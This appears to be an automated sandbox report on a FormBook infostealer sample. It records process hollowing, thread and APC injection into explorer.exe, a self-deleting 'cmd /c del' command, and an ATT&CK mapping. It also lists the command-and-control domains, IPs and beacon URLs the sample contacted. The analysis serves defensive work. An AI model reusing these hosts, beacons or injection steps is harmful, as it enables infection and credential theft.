          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03818A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03805210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03823A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03844A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03894257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03824120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03809080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03883884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Section loaded: unknown target: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 11C0000
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Process created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: explorer.exe, 00000004.00000002.906939906.0000000000AD8000.00000004.00000020.sdmp | Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.919431085.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook (same Yara matches as listed under Stealing of Sensitive Information)

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | Path Interception | Access Token Manipulation1 | Virtualization/Sandbox Evasion3 | OS Credential Dumping | Security Software Discovery231 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection512 | Access Token Manipulation1 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection512 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information3 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing11 | Cached Domain Credentials | System Information Discovery13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features

          Behavior Graph

          [Behavior graph image omitted. Behavior Graph ID: 412599, Sample: 1cec9342_by_Libranalysis, Start date: 12/05/2021, Architecture: WINDOWS, Score: 100.
          Process chain shown in the graph: 1cec9342_by_Libranalysis.exe (drops C:\Users\user\AppData\...\8t7v9o92aq2mtu.dll, PE32) -> 1cec9342_by_Libranalysis.exe -> explorer.exe (injected) -> wlanext.exe -> cmd.exe -> conhost.exe.
          Network nodes in the graph: www.changethecompany.net, www.blissfulyogamullicahill.com, changethecompany.net; explorer.exe contacts directflence.com 185.4.135.136 port 80 (TOPHOSTGR, Greece), nobleandmarble.com 209.222.96.146 port 80 (RELIABLESITEUS, United States) and 20 other IPs or domains.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          1cec9342_by_Libranalysis.exe | 54% | Virustotal |
          1cec9342_by_Libranalysis.exe | 24% | Metadefender |
          1cec9342_by_Libranalysis.exe | 83% | ReversingLabs | Win32.Trojan.FormBook
          1cec9342_by_Libranalysis.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll | 26% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll | 59% | ReversingLabs | Win32.Trojan.Spynoon

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.wlanext.exe.3d17960.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.0.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          7.2.wlanext.exe.354df80.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          rogersbeefarm.com | 0% | Virustotal |
          www.blissfulyogamullicahill.com | 0% | Virustotal |
          tecquestrian.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.rainboxs.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ0%Avira URL Cloudsafe
          www.nobleandmarble.com/or4i/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
nowhealthdays.com | 198.54.114.164 | true | true | - | unknown
rogersbeefarm.com | 34.102.136.180 | true | false | - | unknown
www.blissfulyogamullicahill.com | 199.59.242.153 | true | false | - | unknown
tecquestrian.com | 34.102.136.180 | true | false | - | unknown
www.booweats.com | 64.190.62.111 | true | true | - | unknown
shops.myshopify.com | 23.227.38.74 | true | true | - | unknown
rainboxs.com | 34.102.136.180 | true | false | - | unknown
www.cuntrera.com | 154.93.81.33 | true | true | - | unknown
changethecompany.net | 34.102.136.180 | true | false | - | unknown
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 3.16.197.4 | true | false | - | high
nobleandmarble.com | 209.222.96.146 | true | true | - | unknown
directflence.com | 185.4.135.136 | true | true | - | unknown
ikeberto.com | 34.102.136.180 | true | false | - | unknown
pixie.porkbun.com | 44.227.76.166 | true | false | - | high
www.healshameyoga.com | unknown | unknown | true | - | unknown
www.ikeberto.com | unknown | unknown | true | - | unknown
www.mmgenius.com | unknown | unknown | true | - | unknown
www.directflence.com | unknown | unknown | true | - | unknown
www.tecquestrian.com | unknown | unknown | true | - | unknown
www.rogersbeefarm.com | unknown | unknown | true | - | unknown
www.changethecompany.net | unknown | unknown | true | - | unknown
www.rainboxs.com | unknown | unknown | true | - | unknown
www.safegrinder.com | unknown | unknown | true | - | unknown
www.nowhealthdays.com | unknown | unknown | true | - | unknown
www.nobleandmarble.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.cuntrera.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z | true | Avira URL Cloud: safe | unknown
http://www.rogersbeefarm.com/or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP | false | Avira URL Cloud: safe | unknown
http://www.safegrinder.com/or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP | true | Avira URL Cloud: safe | unknown
http://www.healshameyoga.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG | true | Avira URL Cloud: safe | unknown
http://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx | true | Avira URL Cloud: safe | unknown
http://www.tecquestrian.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ | false | Avira URL Cloud: safe | unknown
http://www.nowhealthdays.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi | true | Avira URL Cloud: safe | unknown
http://www.changethecompany.net/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR | false | Avira URL Cloud: safe | unknown
http://www.nobleandmarble.com/or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP | true | Avira URL Cloud: safe | unknown
http://www.booweats.com/or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP | true | Avira URL Cloud: safe | unknown
http://www.mmgenius.com/or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP | true | Avira URL Cloud: safe | unknown
http://www.ikeberto.com/or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP | false | Avira URL Cloud: safe | unknown
http://www.rainboxs.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ | false | Avira URL Cloud: safe | unknown
www.nobleandmarble.com/or4i/ | true | Avira URL Cloud: safe | low

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande | wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | 1cec9342_by_Libranalysis.exe | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_Error | 1cec9342_by_Libranalysis.exe | false | - | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.%s.comPA | explorer.exe, 00000004.00000000.656903720.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
198.54.114.164 | nowhealthdays.com | United States | 22612 | NAMECHEAP-NETUS | true
154.93.81.33 | www.cuntrera.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
3.16.197.4 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false
34.102.136.180 | rogersbeefarm.com | United States | 15169 | GOOGLEUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
64.190.62.111 | www.booweats.com | United States | 11696 | NBS11696US | true
209.222.96.146 | nobleandmarble.com | United States | 23470 | RELIABLESITEUS | true
44.227.76.166 | pixie.porkbun.com | United States | 16509 | AMAZON-02US | false
185.4.135.136 | directflence.com | Greece | 199246 | TOPHOSTGR | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412599
Start date: 12.05.2021
Start time: 20:01:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 1cec9342_by_Libranalysis (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
